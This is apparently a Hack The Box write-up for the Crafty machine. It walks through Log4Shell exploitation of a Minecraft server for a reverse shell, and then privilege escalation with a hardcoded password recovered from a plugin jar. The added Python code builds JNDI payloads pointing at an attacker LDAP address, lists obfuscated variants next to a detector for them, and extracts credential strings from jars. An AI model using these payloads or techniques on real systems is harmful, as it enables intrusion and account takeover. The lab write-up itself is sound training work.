In this post, I would like to share a walkthrough of the Crafty machine from Hack The Box.
This machine is rated Easy on Hack The Box.

What will you gain from the Crafty machine?
For the user flag, you must exploit a Minecraft server that is vulnerable to Log4Shell (CVE-2021-44228) because it logs through the Java Log4j library. I connect to the server with a free command-line Minecraft client and send a Log4Shell payload as a chat message, which gives shell access to the system.
For the root flag, you need to locate a plugin installed on the Minecraft server and analyse it to uncover a hardcoded password that is reused by the Administrator account.
Information Gathering on Crafty Machine
Once the VPN connection is up (the OpenVPN configuration is downloaded from Hack The Box), we can start with an nmap scan.
┌─[darknite@parrot]─[~/Documents/htb/crafty]
└──╼ $nmap -sV -sC 10.10.11.249 -oA initial
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-14 17:00 EDT
Nmap scan report for 10.10.11.249
Host is up (0.28s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://crafty.htb
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.57 seconds
┌─[darknite@parrot]─[~/Documents/htb/crafty]
└──╼ $
Only port 80 is open in the default scan, and it redirects to http://crafty.htb, so add that hostname to /etc/hosts before browsing. Note that nmap's default scan covers only the 1000 most common TCP ports, and the Minecraft default port (25565) is not among them, so a full scan with -p- is worth running on this box. Let's access the website first.

The site advertises an online Minecraft game server.

At the bottom of the page there is a link to a subdomain that does not serve any web interface, which suggests it is meant for the game client rather than a browser.

At this point, I was stuck on the machine for almost 3 hours and did not get any useful information.
CVE-2021-44228 (Log4Shell) on the Crafty machine
After thinking hard, I remembered that Minecraft had been vulnerable to Log4j, thanks to John Hammond's video from a long time ago.

Therefore, let's take the exploit from John Hammond's video and apply it here. To use it, download the proof-of-concept from the linked GitHub repository.

Clone the proof-of-concept onto the attacker machine.

The screenshot above shows the contents of the repository.

The PoC's payload class spawns a Unix shell by default, so we need to change the value of "String cmd" to cmd.exe, because the victim machine runs Windows.

The PoC also requires a Java 8 JDK (jdk1.8.0_181) to be installed on the attacker machine.

However, the PoC looks for the JDK in a directory named jdk1.8.0_20, so we need to rename the extracted jdk1.8.0_181 directory to jdk1.8.0_20.

Next, we start a listener on the attacker machine to catch the reverse shell.

Aside from that, we run the log4j-shell PoC as shown above; it serves the malicious class and prints the ${jndi:ldap://...} string that we must get the server to log.

We also need pyCraft, a Python Minecraft client, on the attacker machine to connect to the game server.

To keep the tool's dependencies isolated, let's run it inside a Docker container.


Installing the requirements takes a few minutes.

Once the client is connected, we paste the ${jndi:ldap://...} string printed by the PoC as a chat message. The server logs the chat line through Log4j, the JNDI lookup is resolved against our LDAP server, the payload class is loaded, and the reverse shell connects back to our listener.

At last, we have successfully received the reverse shell.
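As an added example (not code from the original post or from the PoC it uses), the script below shows the plain form of the chat message the PoC tells us to send, and why Log4j's lookup syntax makes it easy to slip past a naive filter: Log4j resolves nested ${...} lookups from the inside out, so ${${lower:j}ndi:...} and ${${::-j}ndi:...} end up identical to ${jndi:...}. The normaliser undoes those nestings the way Log4j's substitutor would and then flags the JNDI lookups found in a few constructed Minecraft-style server log lines. The log lines, the player name and the attacker address 10.10.14.5 are all made up for the example.

```python
import re

# Constructed Minecraft-style server log lines (not taken from the Crafty box);
# 10.10.14.5 stands in for the attacker's VPN address.
SAMPLE_LOG = """\
[17:02:11] [Server thread/INFO]: darknite joined the game
[17:02:30] [Server thread/INFO]: <darknite> hello everyone
[17:03:02] [Server thread/INFO]: <darknite> ${jndi:ldap://10.10.14.5:1389/a}
[17:03:40] [Server thread/INFO]: <darknite> ${${lower:j}ndi:${lower:l}dap://10.10.14.5:1389/a}
[17:04:05] [Server thread/INFO]: <darknite> ${${env:NOPE:-j}ndi:rmi://10.10.14.5:1099/a}
[17:04:20] [Server thread/INFO]: <darknite> the year is ${date:yyyy}
"""

# An innermost lookup: a ${...} whose body contains no further '${' or '}'.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def build_payload(host: str, port: int = 1389, path: str = "a") -> str:
    """The plain form of the chat message: a JNDI lookup pointing at our LDAP server."""
    return "${jndi:ldap://%s:%d/%s}" % (host, port, path)


def normalize(text: str):
    """Resolve nested Log4j lookups from the inside out, as Log4j's StrSubstitutor does.

    Returns (normalized_text, jndi_targets). Lookups that cannot be evaluated
    offline (date, sys, ...) are replaced by a placeholder so the loop terminates.
    """
    targets = []
    while True:
        m = INNERMOST.search(text)
        if m is None:
            return text, targets
        body = m.group(1)
        key, _, rest = body.partition(":")
        key = key.strip().lower()  # Log4j lower-cases the lookup prefix
        if key == "jndi":
            # A JNDI lookup: record the target and neutralise it in the output.
            targets.append(rest)
            replacement = "<JNDI:%s>" % rest
        elif key == "lower":
            replacement = rest.lower()
        elif key == "upper":
            replacement = rest.upper()
        elif ":-" in body:
            # ${prefix:name:-default} evaluates to the default when the name is
            # undefined; ${::-j} is the classic way to spell a single letter.
            replacement = body.split(":-", 1)[1]
        else:
            replacement = "<%s>" % key
        text = text[:m.start()] + replacement + text[m.end():]


def scan_log(log_text: str):
    """Return [(line_number, jndi_target)] for every log line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        _, targets = normalize(line)
        hits.extend((number, target) for target in targets)
    return hits


if __name__ == "__main__":
    print("payload:", build_payload("10.10.14.5"))
    for number, target in scan_log(SAMPLE_LOG):
        print("line %d: JNDI lookup to %s" % (number, target))
```

Running it prints the payload and three hits (lines 3, 4 and 5 of the sample); line 6, a harmless ${date:...} lookup, is not flagged. On the defensive side this normalisation is what belongs in front of a log monitor or WAF rule, since grepping for the literal ${jndi: misses the nested forms.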


We can read the user flag by typing the “type user.txt” command
Escalating to Administrator privileges on the Crafty machine


The Minecraft server's plugins directory contains a .jar file; we need to transfer it to the attacker machine for analysis.
Analysis using a Java decompiler

For this purpose, we use jd-gui to read the decompiled contents of the .jar file.

We can start the Java decompiler with the command above.


In the decompiled source we find a hardcoded password, which is what we need for the next step.
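Added example, not the post's own method: jd-gui is the comfortable way to read the plugin, but when no decompiler is at hand the same hardcoded password can be pulled out of the jar with a few lines of Python. String literals in a compiled class are exactly the CONSTANT_Utf8 entries that a CONSTANT_String entry points at (every other Utf8 entry is a class name, method name or descriptor), so walking the constant pool of each .class file in the jar yields the literals without decompiling anything. The jar in the script is constructed for the example: the package example/plugin, the rcon.password key and the Sup3rS3cret! value are made up and are not the Crafty plugin's contents.

```python
import io
import re
import struct
import zipfile

# Constant-pool tags from the JVM class file spec, grouped by payload size.
TWO_BYTES = {7, 8, 16, 19, 20}              # Class, String, MethodType, Module, Package
FOUR_BYTES = {3, 4, 9, 10, 11, 12, 17, 18}  # Integer, Float, *ref, NameAndType, (Invoke)Dynamic
EIGHT_BYTES = {5, 6}                        # Long, Double (each occupies two pool slots)


def class_string_literals(data: bytes):
    """Return the string literals of one class file, in constant-pool order.

    Only CONSTANT_String (tag 8) entries are literals from the source code, so we
    keep just the CONSTANT_Utf8 entries that a String entry points at.
    """
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    (count,) = struct.unpack(">H", data[8:10])  # constant_pool_count (entries are 1..count-1)
    pos, index = 10, 1
    utf8, string_refs = {}, []
    while index < count:
        tag = data[pos]
        pos += 1
        if tag == 1:  # CONSTANT_Utf8: u2 length + bytes (modified UTF-8)
            (length,) = struct.unpack(">H", data[pos:pos + 2])
            pos += 2
            utf8[index] = data[pos:pos + length].decode("utf-8", "replace")
            pos += length
        elif tag == 8:  # CONSTANT_String: u2 index of the Utf8 entry holding the text
            string_refs.append(struct.unpack(">H", data[pos:pos + 2])[0])
            pos += 2
        elif tag in TWO_BYTES:
            pos += 2
        elif tag in FOUR_BYTES:
            pos += 4
        elif tag in EIGHT_BYTES:
            pos += 8
            index += 1  # Long and Double take two slots
        elif tag == 15:  # CONSTANT_MethodHandle: u1 reference_kind + u2 reference_index
            pos += 3
        else:
            raise ValueError("unknown constant pool tag %d" % tag)
        index += 1
    return [utf8[i] for i in string_refs if i in utf8]


def jar_string_literals(jar_bytes: bytes):
    """Map every .class entry of a jar to its string literals."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                result[name] = class_string_literals(jar.read(name))
    return result


def grep_literals(jar_bytes: bytes, pattern: str):
    """Return (class, literal) pairs whose literal matches the regex, e.g. credential hints."""
    regex = re.compile(pattern)
    return [(cls, lit) for cls, lits in jar_string_literals(jar_bytes).items()
            for lit in lits if regex.search(lit)]


def build_sample_class(literals, identifiers=("java/lang/Object", "<init>", "()V")):
    """Build a minimal class file for the demo: enough for the parser above, but not
    loadable by a JVM. Constructed sample, not a real plugin class."""
    pool = []
    for ident in identifiers:  # Utf8 entries no String refers to: identifiers, not literals
        pool.append(b"\x01" + struct.pack(">H", len(ident)) + ident.encode())
    pool.append(b"\x05" + struct.pack(">q", 1337))  # a Long, to exercise the two-slot rule
    used = len(identifiers) + 2
    for lit in literals:
        enc = lit.encode()
        pool.append(b"\x01" + struct.pack(">H", len(enc)) + enc)  # Utf8 at index used+1
        pool.append(b"\x08" + struct.pack(">H", used + 1))        # String -> that Utf8
        used += 2
    header = b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, used + 1)  # magic, minor, major, count
    trailer = struct.pack(">7H", 0x0021, 1, 1, 0, 0, 0, 0)  # flags, this, super, empty tables
    return header + b"".join(pool) + trailer


def build_sample_jar():
    """A two-class jar standing in for the Minecraft plugin (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("example/plugin/Config.class",
                     build_sample_class(["rcon.password", "Sup3rS3cret!"]))
        jar.writestr("example/plugin/Main.class",
                     build_sample_class(["Plugin enabled"]))
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_jar()
    for cls, lits in jar_string_literals(sample).items():
        print(cls, lits)
    print("credential hints:", grep_literals(sample, r"(?i)pass|secret|rcon"))
```

Against the real plugin, call jar_string_literals on the bytes of the downloaded .jar (the file name is whatever you saved it as). grep_literals narrows the list to literals that look like credential keys, and the literal next to such a key in the same class is usually the value worth trying against the Administrator account.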

Let's upload a reverse-shell executable together with RunasCs.exe to the victim machine.

With the command above, RunasCs runs the executable as Administrator using the password recovered from the plugin (it is reused for the local Administrator account), and our listener receives an elevated shell.

We can read the root flag by typing the “type root.txt” command